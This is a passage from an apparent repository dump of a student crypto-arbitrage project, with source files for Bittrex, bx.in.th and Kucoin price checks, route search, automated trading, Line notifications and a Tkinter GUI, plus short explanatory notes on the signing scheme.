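    raise RuntimeError('balance never increased within the timeout')

A call such as wait_for_balance_increase(lambda: bittrexapi.getBalance(sendCur1), beforeSend1) would replace the first deposit-wait loop in routeTrade.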
{
"alpha_fraction": 0.6098901033401489,
"alphanum_fraction": 0.6538461446762085,
"avg_line_length": 14.25,
"blob_id": "f26920cce3ed3c2d8e40f69c275ddbdebf85240d",
"content_id": "cbd6dcfc48a72224910e14a1396fbb83307de7e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 12,
"path": "/rcall.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "from RouteCk import *\nimport time\nfrom lineMsg import *\ni = 0\nwhile True:\n\tprint(\"Start\")\n\tRouteCkLine()\n\ti = i + 1\n\tif(i==12):\n\t\tsentLine(\"Status Checked\")\n\t\ti = 0\n\ttime.sleep(300)"
},
{
"alpha_fraction": 0.6329004168510437,
"alphanum_fraction": 0.6398268342018127,
"avg_line_length": 35.125,
"blob_id": "f4be8491a5cc43b6b72bf03f73c7401fd06c87ff",
"content_id": "d4fd18afa3db19323732723a62051e9c0418fdbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1155,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 32,
"path": "/RouteCk.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nfrom myFunc import *\nfrom routeKucoin import *\nimport datetime as dt\n\ndef RouteCkLine():\n\tnoti_token = \"\"\n\tnoti_url = \"https://notify-api.line.me/api/notify\"\n\tnoti_headers = {'content-type':'application/x-www-form-urlencoded','Authorization':'Bearer '+noti_token}\n\t#select = {1:getRoute(bx,bt),2:getRoute2(),3:getRoute3(bx,kucoin),4:getRoute4(bt,kucoin)}\n\tbx = getBx()\n\tbt = getBittrex()\n\tkucoin = getKucoin()\n\tRoute = getRoute(bx,bt)\n\n\tif(Route.tradeRoute != []):\n\t\tnoti_msg = str(dt.datetime.now()) +'Bx -> Bt'+\"\\n\"\n\t\tfor i in range(len(Route.tradeRoute)):\n\t\t\tnoti_msg += str(Route.tradeRoute[i]) + \"\\n\" + str(Route.profit) +\"\\n\" +\"---------\"+\"\\n\"\n\t\t\tprint(noti_msg)\t\t\n\t\t\tr=requests.post(noti_url,headers = noti_headers ,data = {'message':noti_msg})\n\t\t\t#print(r.text)\n\n\tRoute = getRoute3(bx,kucoin)\n\n\tif(Route.tradeRoute != []):\n\t\tnoti_msg = str(dt.datetime.now()) +'Bx -> Kucoin'+\"\\n\"\n\t\tfor i in range(len(Route.tradeRoute)):\n\t\t\tnoti_msg += str(Route.tradeRoute[i]) + \"\\n\" + str(Route.profit) +\"\\n\" +\"---------\"+\"\\n\"\n\t\t\tprint(noti_msg)\t\t\n\t\t\tr=requests.post(noti_url,headers = noti_headers ,data = {'message':noti_msg})\n\t\t\t#print(r.text)"
},
{
"alpha_fraction": 0.6497027277946472,
"alphanum_fraction": 0.712485134601593,
"avg_line_length": 39.03809356689453,
"blob_id": "d900e5e7ed5f555710d4eaafd7f24441e18cca4b",
"content_id": "9e77b44537161869028ece70856879423ec02d33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4205,
"license_type": "no_license",
"max_line_length": 715,
"num_lines": 105,
"path": "/bxapi.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nimport hashlib\nimport time\n\n\nkey = \"\"\nsecret = \"\"\n\n#nonce = str(time.time())\n#signature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\ndef createOrder(pairing,tradeType,amount,rate):\n\tpairID = getPairID(pairing)\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\tamount = float(amount)\n\trate = float(rate)\n\turl = \"https://bx.in.th/api/order/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature,'pairing':pairID,'type':tradeType,'amount':amount,'rate':rate});\n\treturn r.json()\n\ndef cancelOrder(pairing,order_id):\n\tnonce = str(time.time())\n\tpairID = getPairID(pairing)\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/cancel/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature,'pairing':pairID,'order_id':order_id});\n\treturn r.json()\n\ndef getBalances():\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/balance/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature});\n\treturn r.json()\n\ndef getBalance(currency):\n\t\treturn float(getBalances()['balance'][currency]['available'])\n\ndef getDepositAddr(currency):\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/deposit/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature,'currency':currency});\n\treturn r.json()\n\ndef getDepositAddr2(currency):\n\tcurAddr={'BTC':'3Hy1YoEmDQYeG1p3tKJgPBDMmTAmT8sfy7','ETH':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','REP':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','BCH':'bitcoincash:qp6n6kn0lkkenxwhd9dsajnd90n7p5eq0cwn7zfhgj','BSV':'bitcoincash:qp6n6kn0lkkenxwhd9dsajnd90n7p5eq0cwn7zfhgj','DAS':'Xc6ibPyBwjfDtYvva4dNg7R6rP8xuJNCqG','DOG':'DByLBCnEVwCu7hEekE7H2ZXNY68ijkfRQT','DOGE':'DByLBCnEVwCu7hEekE7H2ZXNY68ijkfRQT','FTC':'6uwzEKjapNpNvs9ovhpjnyaV1jf1r9TwK9','GNO':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','LTC':'LeqJRqF7R9VDTquVUqZosgLjshQriwwex4','OMG':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','POW':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19','XRP':'rp7Fq2NQVRJxQJvUZ4o8ZzsTSocvgYoBbs?dt=1033113822','ZEC':'t1avqg1RmHp895os4NWVnj8uMAZyPTHAhSH','XZC':'0xFf5ec360bc180e219D36088F3F2935E629Af9F19'}\n\treturn curAddr[currency]\n\ndef withdraw(currency,amount,addr): #for XRP addr+'?dt='+tag\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/withdrawal/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature,'currency':currency,'amount':amount,'address':addr});\n\treturn r.json()\n\ndef wdHistory():\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/withdrawal-history/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature});\n\treturn r.json()\n\ndef TransHistory():\n\tnonce = str(time.time())\n\tsignature = hashlib.sha256((key+nonce+secret).encode('ASCII')).hexdigest();\n\turl = \"https://bx.in.th/api/history/\"\n\tr=requests.post(url, data = {'key':key,'nonce':nonce,'signature':signature});\n\treturn r.json()['transactions']\n\ndef getPrice(pairing,tradeType):\n\tpairID = getPairID(pairing)\n\turl = 
\"https://bx.in.th/api/orderbook/?pairing=\"+str(pairID)\n\tr = requests.get(url)\n\tdata = r.json()\n\tif(tradeType == 'buy'):\n\t\treturn float(data['bids'][0][0]),float(data['bids'][0][1])\n\tif(tradeType == 'sell'):\n\t\treturn float(data['asks'][0][0]),float(data['asks'][0][1])\n\ndef getPairID(pairing):\n\turl = \"https://bx.in.th/api/pairing/\"\n\treq = requests.get(url)\n\tallPair = req.json()\n\tpairing = pairing.split('-')\n\tfor i in range(1,35):\n\t\ttry:\n\t\t\tif(pairing[0]==allPair[str(i)]['primary_currency'] and pairing[1]==allPair[str(i)]['secondary_currency']):\n\t\t\t\treturn i\n\t\texcept:\n\t\t\tpass\n\n'''a,s =getPrice('THB-DOG','buy')\nprint(a)\nprint(s)'''\n#print(getPairID('THB-XRP')==None)\n#w=createOrder('BTC-XRP','buy',1,0.0001)\n#print(w)\n#print(getDepositAddr('ETH'))\n#print(getPrice('THB-BTC','sell'))\n#print(getDepositAddr2('DOGE'))\n#print(getBalance('THB'))\n#print(TransHistory()[3])\n#print(getBalance('THB'))\n\n"
},
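bxapi.py uses a different signing scheme from the Bittrex module: the signature is simply the SHA-256 hex digest of key + nonce + secret, posted as ordinary form fields. A compact sketch of that scheme as one helper, illustrative only; as the project README notes, bx.in.th has shut down, so the endpoint no longer resolves.

import hashlib
import time
import requests

def bx_signed_post(endpoint, key, secret, extra=None):
    # bx.in.th private-API scheme: SHA-256(key + nonce + secret) as a form field.
    nonce = str(time.time())
    signature = hashlib.sha256((key + nonce + secret).encode('ascii')).hexdigest()
    data = {'key': key, 'nonce': nonce, 'signature': signature}
    data.update(extra or {})
    return requests.post('https://bx.in.th/api/' + endpoint + '/', data=data).json()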
{
"alpha_fraction": 0.37428224086761475,
"alphanum_fraction": 0.38907256722450256,
"avg_line_length": 48.982608795166016,
"blob_id": "00d9a4bcc68eddd7ef6b8d9e1a12670e9c2420c4",
"content_id": "c4310c151cbb5b104a3edb8179aca689372130a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5747,
"license_type": "no_license",
"max_line_length": 267,
"num_lines": 115,
"path": "/routeOkex.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "from myFunc import *\nclass getRoute2():\n def __init__(self,bt,okex):\n self.route(bt,okex)\n def route(self,bt,okex):\n temp_cur = [0]*5\n temp_tradeA = [0]*5\n temp_tradeB = [0]*5\n temp_value = [0]*5\n money = 500\n profit = []\n tradeRoute = []\n btUSD_id = []\n #print(bt.pairName)\n #print(bt.namePri[0])\n for i in range(len(bt.namePri)):\n if(bt.namePri[i] == 'USD'):\n #print(bt.pairName[i])\n btUSD_id.append(i)\n USD_id = btUSD_id\n for i in USD_id:\n value = money/bt.priceSell[i]\n value_cur = bt.nameSec[i]\n if(not value_cur in bt_fee):\n break\n if(value_cur == \"GNO\" or value_cur == \"REP\"):\n continue\n #print(\"%f %s\"%(value,value_cur))\n value = value-bt_fee[value_cur] #Send to bittrex\n temp_cur[0] = value_cur;\n temp_tradeA[0]=bt.namePri[i]\n temp_tradeB[0]=bt.nameSec[i]\n temp_value[0] = value\n #print('b')\n #---------------Sent to Bittrex ---------------\n for j in range(300):\n value = temp_value[0]\n if(temp_cur[0] == okex.namePri[j]):\n value = value/okex.priceSell[j] \n value_cur = okex.nameSec[j]\n temp_tradeA[1] = okex.namePri[j]\n temp_tradeB[1] = okex.nameSec[j]\n elif(temp_cur[0] == okex.nameSec[j]):\n value = value*okex.priceBuy[j]\n value_cur = okex.namePri[j]\n temp_tradeA[1] = okex.nameSec[j]\n temp_tradeB[1] = okex.namePri[j]\n else : continue\n temp_cur[1] = value_cur;\n temp_value[1] = value\n\n #print('c')\n for k in range(300):\n value = temp_value[1]\n if((okex.namePri[k] or okex.nameSec[k]) in okex_sent_cur):\n if(temp_cur[1] == okex.namePri[k]):\n value = value/okex.priceSell[k] \n value_cur = okex.nameSec[k]\n temp_tradeA[2] = okex.namePri[k]\n temp_tradeB[2] = okex.nameSec[k]\n \n elif(temp_cur[1] == okex.nameSec[k]):\n value = value*okex.priceBuy[k]\n value_cur = okex.namePri[k]\n temp_tradeA[2] = okex.nameSec[k]\n temp_tradeB[2] = okex.namePri[k]\n #print(value_cur)\n else: continue;\n if(not(value_cur in okex_sent_cur)):\n continue;\n value = value - okex_fee[value_cur]\n temp_cur[2] = value_cur;\n temp_value[2] = value\n #--------------Send back to bt-------------\n #print('d')\n for l in range(40):\n value=temp_value[2]\n if(temp_cur[2] == bt.namePri[l]):\n value = value/bt.priceSell[l] \n value_cur = bt.nameSec[l]\n temp_tradeA[3]=bt.namePri[l]\n temp_tradeB[3]=bt.nameSec[l]\n elif(temp_cur[2] == bt.nameSec[l]):\n value = value*bt.priceBuy[l]\n value_cur = bt.namePri[l]\n temp_tradeA[3]=bt.nameSec[l]\n temp_tradeB[3]=bt.namePri[l]\n else : continue\n temp_cur[3] = value_cur;\n temp_value[3] = value\n #print('e')\n for m in USD_id:\n value = temp_value[3]\n if(temp_cur[3] == bt.nameSec[m]):\n value = value*bt.priceBuy[m]\n temp_tradeA[4]=bt.nameSec[m]\n temp_tradeB[4]=bt.namePri[m]\n value_cur=bt.namePri[m]\n temp_value[4] = value\n #print('zzz')\n #print(value)\n #print(\"THB > %s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n #print(\"THB > %s/%s >|| %s/%s > %s/%s >|| %s/%s > %s/%s\"%(temp_tradeA[0],temp_tradeB[0],temp_tradeA[1],temp_tradeB[1],temp_tradeA[2],temp_tradeB[2],temp_tradeA[3],temp_tradeB[3],temp_tradeA[4],temp_tradeB[4]))\n if(value > money):\n print(\"Result money %d Profit %d >> %s\" %(value,value-money,value_cur))\n print(\"%s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n profit.append(value-money)\n tradeRoute.append([ \"%s-%s\"%(temp_tradeA[0],temp_tradeB[0]) , \"%s-%s\"%(temp_tradeA[1],temp_tradeB[1]) ,\"%s-%s\"%(temp_tradeA[2],temp_tradeB[2]) ,\"%s-%s\"%(temp_tradeA[3],temp_tradeB[3]) ,\"%s-%s\"%(temp_tradeA[4],temp_tradeB[4]) ])\n self.profit = profit\n 
self.tradeRoute = tradeRoute\n print(\"end\")\n\nbt_sent_cur , bt_fee = getSentBt()\nokex_sent_cur = bt_sent_cur\nokex_fee = bt_fee"
},
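The route searches in this repo (getRoute2 above and its siblings) all reduce to one conversion step applied along a chain: pay the ask to move into a pair's secondary currency, or receive the bid to move back out, and keep any chain that ends with more money than it started with. That single hop in isolation, as a sketch with illustrative names and prices:

def convert(amount, holding, pair_pri, pair_sec, ask, bid):
    # One hop of the route search: buy the secondary at the ask,
    # or sell it back to the primary at the bid.
    if holding == pair_pri:
        return amount / ask, pair_sec
    if holding == pair_sec:
        return amount * bid, pair_pri
    return None

print(convert(500.0, 'USD', 'USD', 'BTC', 10000.0, 9990.0))  # (0.05, 'BTC')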
{
"alpha_fraction": 0.662382185459137,
"alphanum_fraction": 0.6692373752593994,
"avg_line_length": 30.45945930480957,
"blob_id": "dc965f8bb8965d1ecad58864eeee8874cbd38baf",
"content_id": "4241bf7bed7abd1d2b9d3b81e8ad04ea11490f3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1167,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 37,
"path": "/fullAuto.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nfrom myFunc import *\nfrom routeKucoin import *\nimport datetime as dt\nfrom lineMsg import *\nimport numpy as np\nfrom autotrade import *\n\ndef fullAutoTrade():\n\tnoti_token = \"\" #Line Token\n\tnoti_url = \"https://notify-api.line.me/api/notify\"\n\tnoti_headers = {'content-type':'application/x-www-form-urlencoded','Authorization':'Bearer '+noti_token}\n\t#select = {1:getRoute(bx,bt),2:getRoute2(),3:getRoute3(bx,kucoin),4:getRoute4(bt,kucoin)}\n\tbx = getBx()\n\tbt = getBittrex()\n\tkucoin = getKucoin()\n\tRoute = getRoute(bx,bt)\n\n\tif(Route.tradeRoute != []):\n\t\tnoti_msg = str(dt.datetime.now()) +'Bx -> Bt'+\"\\n\"\n\t\tfor i in range(len(Route.tradeRoute)):\n\t\t\tnoti_msg += str(Route.tradeRoute[i]) + \"\\n\" + str(Route.profit[i]) +\"\\n\" +\"---------\"+\"\\n\"\n\t\t\t#print(r.text)\t\t\n\tr=requests.post(noti_url,headers = noti_headers ,data = {'message':noti_msg})\n\tif(Route.tradeRoute != []):\n\t\tif(np.max(Route.profit) > 5):\n\t\t\tprint(\"Trade!\")\n\t\t\tsentLine(\"Start Trade\")\n\t\t\tmaxR = np.argmax(Route.profit)\n\t\t\troute = Route.tradeRoute[maxR]\n\t\t\tsentLine(\"Route \"+ str(route))\n\t\t\tTrade = routeTrade(Route.profit,Route.tradeRoute)\n\t\t\tsentLine(Trade)\n\nwhile True:\n\tfullAutoTrade()\n\tpass\n\n\n\n"
},
{
"alpha_fraction": 0.6251993775367737,
"alphanum_fraction": 0.6698564887046814,
"avg_line_length": 38.1875,
"blob_id": "6a62ec3beb96e1cfcd84e51d0f5554cb28335d96",
"content_id": "18142787920793b73630d10675edf6c1833a3b86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 627,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 16,
"path": "/README.md",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "# crypto-arbitrage\n**My Senior Project 2018-2019**\n## ****This program is no longer useable because the bx.in.th exchanger is out of business. **\n\nrun GUI `python GUI.py`\n\n#### Home\n[](https://i.imgur.com/7J9fWyE.jpg \"\")\n[](https://i.imgur.com/K8j2FIh.jpg)\n#### Info get coin pair price, account balance\n[](https://imgur.com/wahrc15.jpg)\n#### Setting fill API key\n[](https://i.imgur.com/MxWP1mY.jpg)\n\n### Algo\n[](https://i.imgur.com/rP6X4Y7.jpg)\n"
},
{
"alpha_fraction": 0.6107944846153259,
"alphanum_fraction": 0.6712806820869446,
"avg_line_length": 28.85416603088379,
"blob_id": "7d334dd11c1aa21c659db502d6d68ebb49a36a0b",
"content_id": "af7e1199652247abd0dd6a834356a2fb625c74af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8597,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 288,
"path": "/GUI.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nfrom tkinter import ttk\nfrom myFunc import *\nimport numpy as np\nfrom autotrade import *\nfrom tkinter import messagebox\nimport tkinter\nimport bxapi\nimport bittrexapi\nimport time\nimport datetime as dt\nimport threading\n\n\ndef run():\n\tttt.configure(state=NORMAL)\n\tttt.insert(END,f\"Checking Route time:{str(dt.datetime.now())} \\n\")\n\tbx = getBx()\n\tbt = getBittrex()\n\tRoute = getRoute(bx,bt)\n\tif(Route.tradeRoute == []):\n\t\tttt.insert(END,\" No Route Found!\\n\")\n\t\tttt.insert(END,\" Delaying 2 Mins\\n\")\n\t\ttime.sleep(120)\n\t\trun()\n\telse :\n\t\tmsg = \"\"\n\t\tfor i in range(len(Route.tradeRoute)):\n\t\t\tmsg += str(Route.tradeRoute[i]) + \"\\n\" + str(Route.profit[i]) +\"\\n\"\n\t\tttt.insert(END,msg)\n\t\tif(np.max(Route.profit) > 5):\n\t\t\tttt.insert(END,\"Start Trade\\n\")\n\t\t\tmaxR = np.argmax(Route.profit)\n\t\t\troute = Route.tradeRoute[maxR]\n\t\t\tttt.insert(END,\"Route \"+ str(route)+\"\\n\")\n\t\t\tTrade = routeTrade(Route.profit,Route.tradeRoute)\n\t\t\tttt.insert(END,str(Trade)+\"\\n\")\n\t\telse :\n\t\t\tttt.insert(END,\"Don't trade Profit too low(High risk)\\n\")\n\t\t\trun()\n\n\ndef call_run():\n\t\tif(not keyCheck()):\n\t\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\t\treturn;\n\t\tttt.configure(state=NORMAL)\n\t\tttt.delete(1.0,END)\n\t\tttt.configure(state=DISABLED)\n\t\tglobal lb1_status\n\t\tif(lb1_status == False):\n\t\t\tmessagebox.showinfo(\"Title\", \"Program is Running !!!\")\n\t\t\treturn\n\t\telse :\n\t\t\tttt.delete(1.0,END)\n\t\t\tthread2 = threading.Thread(target = run)\n\t\t\tthread2.start()\n\ndef transhistory():\n\tif(not keyCheck()):\n\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\treturn;\n\tttt2.config(state=NORMAL)\n\tif(Transhis_box.get() == 'bx'):\n\t#lif(Transhis_box.get() == 'bittrex'):\n\t\tdata = bxapi.TransHistory()\n\t\t#print (\"a\")\n\t\tfor i in range(len(data)):\n\t\t\tttt2.insert(END,f\"Date : {data[i]['date']} , Currency : {data[i]['currency']} , Amount : {data[i]['amount']} , Type : {data[i]['type']} \\n\")\n\tttt2.config(state=DISABLED)\n\ndef tab3Save():\n\tbxapi.key = entrytab3_1.get()\n\tbxapi.secret = entrytab3_2.get()\n\tbittrexapi.key = entrytab3_3.get()\n\tbittrexapi.secret = entrytab3_4.get()\n\ndef keyCheck():\n\t\tif(bxapi.key == \"\" or bxapi.secret==\"\"or bittrexapi.key == \"\" or bittrexapi.secret==\"\"):\n\t\t\treturn False\n\t\telse : return True \n\ndef showGetPrice():\n\tif(not keyCheck()):\n\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\treturn;\n\tif(selEx1.get() == 'bx'):\n\t\tpriceTxt = bxapi.getPrice(entrytab2_1.get(),type1.get())[0]\n\t\tlabeltab2_2.config(text = priceTxt)\n\telif(selEx1.get() == 'bittrex'):\n\t\tlabeltab2_2.config(text = bittrexapi.getPrice(entrytab2_1.get(),type1.get())[0])\n\ndef showGetBalance():\n\tif(not keyCheck()):\n\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\treturn;\n\t#print (type(selEx2))\n\tif(selEx2.get() == 'bx'):\n\t\tlabeltab2_4.config(text = bxapi.getBalance(entrytab2_2.get()))\n\telif(selEx2.get() == 'bittrex'):\n\t\tlabeltab2_4.config(text = bittrexapi.getBalance(entrytab2_2.get()))\n\t#print(type1.get())\n\ndef findPath():\n\tglobal lb1_status\n\tlb1_status = False\n\tttt.configure(state=NORMAL)\n\tttt.delete(1.0,END)\n\tttt.insert(END,'Please Wait !!!')\n\t#time.sleep(1)\n\tbx = getBx()\n\tbt = getBittrex()\n\tRoute = 
getRoute(bx,bt)\n\tttt.delete(1.0,END)\n\tif(len(Route.profit) == 0) : ttt.insert(END,'No Route')\n\tfor i in range(len(Route.profit)):\n\t\tprint(\"Profit : %f <> Route : %s \\n\"%(Route.profit[i],Route.tradeRoute[i]))\n\t\tttt.insert(END,\"Profit : %f <> Route : %s \\n\"%(Route.profit[i],Route.tradeRoute[i]))\n\tttt.configure(state=DISABLED)\n\tlb1_status = True\n\ndef call_findPath():\n\tif(not keyCheck()):\n\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\treturn;\n\tglobal lb1_status\n\tif(lb1_status == False):\n\t\tmessagebox.showinfo(\"Title\", \"Program is Running !!!\")\n\t\treturn\n\telse:\n\t\tthread = threading.Thread(target = findPath)\n\t\tthread.start()\n\ndef testF():\n\tstop.clear()\n\tfor i in range(1,100):\n\t\tttt.configure(state=NORMAL)\n\t\ttime.sleep(0.5)\n\t\tttt.insert(END,str(i)+'\\n')\n\t\tttt.configure(state=DISABLED)\ndef stopF():\n\tstop.set()\n\t\ndef boom():\n\tgui.destroy()\n\"\"\"\ndef showTrans():\n\tttt2.config(state=NORMAL)\n\ttransData = bxapi.TransHistory()\n\tprint(transData)\n\tfor i in range(len(transData)):\n\t\tprint('w')\n\t\tprint(f\"Date : {transData[i]['date']} , Currency : {transData[i]['currency']} , Amount : {transData[i]['amount']} , Type : {transData[i]['type']}\")\n\n\tttt2.config(state=DISABLED)\n\"\"\"\n\nstop = threading.Event()\n\ngui = Tk()\ngui.title(\"Bx & Bittrex Arbitrage\")\ngui.geometry(\"640x640\") #640x640\ngui.configure(bg = \"grey\")\n\ntab_ctrl = ttk.Notebook(gui)\n\n\n#tab1\ntab1 = ttk.Frame(tab_ctrl)\ntab_ctrl.add(tab1,text=\"Home\")\nlabeltab1_1 = Label(tab1,text = \"Bx & Bittrex\",fg = \"#CD5C5C\",font = (40))\nlabeltab1_1.place(x=260,y = 10)\nlabeltab1_2 = Label(tab1,text = \"Arbitrage\",fg = \"#CD5C5C\",font = (40))\nlabeltab1_2.place(x=270,y = 40)\nbuttontab1_1 = Button(tab1,text = \"Run\",height = 2,width = 13,command = call_run)\nbuttontab1_1.place(x=100 ,y = 500)\nbuttontab1_2 = Button(tab1,text = \"Find path\",height = 2,width = 13,command = call_findPath)\nbuttontab1_2.place(x=400 ,y = 500)\nbuttontab1_3 = Button(tab1,text = \"Stop\",height = 2,width = 13,command = boom)\nbuttontab1_3.place(x=100 ,y = 550)\nttt = Text(tab1,height = 25,width = 90) #big box\nttt.place(x=35,y=70)\n\nlb1_status = True\n#ttt.pack(side=LEFT, fill=Y)\n#ttt.insert(END,'sdaasda')\n#for i in range(1,100):\n#\tttt.insert(END,str(i)+'\\n')\nttt.config(state=DISABLED)\n#tab2\ntab2 = ttk.Frame(tab_ctrl)\ntab_ctrl.add(tab2,text = \"Info\")\nlbtype2_11 = Label(tab2,text = \"Exchange\",fg = 'black')\nlbtype2_11.place(x=80,y = 2)\nlbtype2_12 = Label(tab2,text = \"Pair\",fg = 'black')\nlbtype2_12.place(x=150,y = 2)\nlbtype2_13 = Label(tab2,text = \"Trade Type\",fg = 'black')\nlbtype2_13.place(x=230,y = 2)\n\n\nlabeltab2_1 = Label(tab2,text = \"Get Price\",fg = 'black')\nlabeltab2_1.place(x=5,y = 20)\nselEx1 = ttk.Combobox(tab2, values=['bx','bittrex'],height = 1,width = 5)\nselEx1.place(x=80,y = 20)\nentrytab2_1 = Entry(tab2,width = 10)\nentrytab2_1.place(x=150,y = 20)\ntype1 = ttk.Combobox(tab2, values=['buy','sell'],height = 1,width = 5)\ntype1.place(x=230,y = 20)\nbuttontab2_1 = Button(tab2,text = \"Ok\",height = 1,width = 5,command = showGetPrice)\nbuttontab2_1.place(x=300,y = 20)\nlabeltab2_2 = Label(tab2,text = \"\",fg = 'black')\nlabeltab2_2.place(x=80,y = 40)\n\nlbtype2_21 = Label(tab2,text = \"Exchange\",fg = 'black')\nlbtype2_21.place(x=80,y = 60)\nlbtype2_22 = Label(tab2,text = \"Coin Name\",fg = 'black')\nlbtype2_22.place(x=150,y = 60)\n\n\nlabeltab2_3 = Label(tab2,text = \"My Balance\",fg = 
'black')\nlabeltab2_3.place(x=5,y = 80)\nselEx2 = ttk.Combobox(tab2, values=['bx','bittrex'],height = 1,width = 5)\nselEx2.place(x=80,y = 80)\nentrytab2_2 = Entry(tab2,width = 10)\nentrytab2_2.place(x=150,y = 80)\nbuttontab2_2 = Button(tab2,text = \"Ok\",height = 1,width = 5,command = showGetBalance)\nbuttontab2_2.place(x=300,y = 80)\nlabeltab2_4 = Label(tab2,text = \"\",fg = 'black')\nlabeltab2_4.place(x=230,y = 80)\n\nlbtype2_21 = Label(tab2,text = \"Exchange\",fg = 'black')\nlbtype2_21.place(x=150,y = 100)\n\nTranshis_label = Label(tab2,text = \"Transactions History\",fg = 'black')\nTranshis_label.place(x=5 , y = 120)\nTranshis_box = ttk.Combobox(tab2, values=['bx','bittrex'],height = 1,width = 5)\nTranshis_box.place(x=150 , y = 120)\n\nTranshis_box_ok = Button(tab2,text = \"Ok\",height = 1,width = 5,command = transhistory)\nTranshis_box_ok.place(x=300,y = 120)\n\nttt2 = Text(tab2,height = 15,width = 100)\nttt2.place(x=5,y=160)\n\n\n#ttt2.insert(END,bxapi.wdHistory())\n\n\n\n\nttt2.config(state=DISABLED)\n\n#tab3\ntab3 = ttk.Frame(tab_ctrl)\ntab_ctrl.add(tab3,text=\"Setting\")\n\nlabeltab3_1 = Label(tab3,text = \"Bx\",fg = 'black',font =(30))\nlabeltab3_1.place(x=300,y = 10)\nlabeltab3_2 = Label(tab3,text = \"API key\",fg = 'black',)\nlabeltab3_2.place(x=70,y = 50)\nentrytab3_1 = Entry(tab3,width = 60)\nentrytab3_1.place(x=150,y = 50)\nlabeltab3_3 = Label(tab3,text = \"API secret\",fg = 'black',)\nlabeltab3_3.place(x=70,y = 70)\nentrytab3_2 = Entry(tab3,width = 60)\nentrytab3_2.place(x=150,y = 70)\n\nlabeltab3_4 = Label(tab3,text = \"Bittrex\",fg = 'black',font =(30))\nlabeltab3_4.place(x=280,y = 100)\nlabeltab3_5 = Label(tab3,text = \"API key\",fg = 'black',)\nlabeltab3_5.place(x=70,y = 140)\nentrytab3_3 = Entry(tab3,width = 60)\nentrytab3_3.place(x=150,y = 140)\nlabeltab3_6 = Label(tab3,text = \"API secret\",fg = 'black',)\nlabeltab3_6.place(x=70,y = 160)\nentrytab3_4 = Entry(tab3,width = 60)\nentrytab3_4.place(x=150,y = 160)\nbuttontab3_1 = Button(tab3,text = \"Send\",height = 2,width = 13,command = tab3Save)\nbuttontab3_1.place(x=260,y = 200)\n\n#push\ntab_ctrl.pack(expand = 1,fill = 'both')\n\n\n\n\n\ngui.mainloop()"
},
{
"alpha_fraction": 0.40127530694007874,
"alphanum_fraction": 0.4340530335903168,
"avg_line_length": 43.034481048583984,
"blob_id": "f677196ffbe3a6ac4d0ee82fcc9de6202f2d5e65",
"content_id": "84bc7e2abc4d5b004113f66cb6cab91680ce3201",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17878,
"license_type": "no_license",
"max_line_length": 411,
"num_lines": 406,
"path": "/myFunc.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
